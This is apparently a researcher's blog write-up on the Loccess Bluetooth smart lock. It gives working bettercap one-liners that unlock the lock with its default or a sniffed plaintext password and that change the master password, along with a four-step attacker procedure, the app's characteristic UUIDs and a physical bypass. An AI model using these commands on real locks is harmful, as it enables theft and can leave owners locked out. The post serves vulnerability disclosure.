Don't worry about being locked with Loccess

Loccess smart lock is promoted as being a lock to be used in luggage, bicycles and lockers. Besides opening with a keypad on the bottom of the device, this smart lock is able to be opened with your smart phone using BLE.
I was able to get this smart lock at Amazon for around $20.

I installed the Android app and after reading the installation manual it seems that the factory code for opening the lock is 000000.

So to make things different I opened the Loccess by default and just by using bettercap (the short manual doesn't tell the user to change the password or even force it on the mobile app):

It JustWorks! By pure luck the first writable characteristic (handle 0x000e) gives us the open sesame operation.

One thing I need to mention is that the Loccess has a wake-up button. You need to press it so it can advertise - but if you think about it, if a malicious user wants to steal something he should be close to the device so, just pressing a button would not be a problem.

What happens if an user changes the default password? I changed it to a strong password (not) - 123456.

Before doing the sniffing, I tried again entering the factory password - just to see if it had a key to rule them all but it didn't work.

Ubertooth caught something interesting. When the victim opens the lock, the following request is caught in plaintext:

Look at the new password. If we update our request and send it to bettercap it will open Loccess. You can use an oneliner for that:

sudo bettercap -eval "net.recon off;ble.recon on;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6ea400002b5a3f393e0a9e50e24dcca9e 313233343536;sleep 2;q"

You can even sniff the authentication from the admin:

0x0014 handle deals with the login username/password:

After getting this access, you can change the button 4 digit pincode, master password and reset to factory values.

Forcing the requests without the login/password will not work.
If the attacker gains the login/password combo and change master lock and button pincode, I don't know where the victim could open the lock again (without breaking it).

Taking from the last pcap from Wireshark, lets PoC with bettercap and change the master password to 666666:

sudo bettercap -eval "net.recon off;ble.recon on;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400004b5a3f393e0a9e50e24dcca9e xxxxxxxx33000000000531323334353600000006;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400005b5a3f393e0a9e50e24dcca9e 363636363636;sleep 2;q"

From an attacker's point of view:

  1. Press the wake-up button
  2. Send an BLE request for the factory password
  3. If not working, attacker should sniff the traffic between victims phone and Loccess
  4. Use the new password (or change the existing one) and open the lock

Regarding the mobile app from Loccess, its quite simple and doesn't have a lot of unnecessary code.

First the permissions from the mobile app:

<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.BLUETOOTH" />
<uses-permission android:name="android.permission.BLUETOOTH_PRIVILEGED" />
<uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.VIBRATE" />

On com.loccess.utils.Constants you have all the characteristics UUIDs you need:

    public static String LOCK_CHARACTERISTIC_BATTERY = "6E400008-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_KEYBOARD_PWD = "6E400009-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_LOGIN = "6E400004-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_MODIFY_PASSWORD = "6E400005-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_REGISTER = "6E400003-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_UNLOCK = "6E400002-B5A3-F393-E0A9-E50E24DCCA9E";

No requests are made to outside and the data is being stored locally:

private static final String DB_NAME = "lockdevice.db";

(...)

private static final String TABLE_CREATE = "create table tbl_lockdevice ( id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, address TEXT UNIQUE, password TEXT, battery INTEGER DEFAULT 0, warning INTEGER DEFAULT 1, ring INTEGER DEFAULT 0, read_lock_status INTEGER DEFAULT 0, auto_unlock INTEGER DEFAULT 0 )";

Like the other lock that I already tested at my personal blog - where I opened the fingerprint lock by directly powering the rotor - I wanted to do something similar.
The lock itself don't seem so robust and seems to have a small spring that I was able to see on the FCCID internal photos.
If I can move that spring, I will be able to open the lock. So I grabbed my Kudu knife and... check out the following video:

In conclusion, I had lot of fun playing with this smart lock and its around the limit budget to be on eyeohtee.cheap :)

Sponsored by: Char49

Show Comments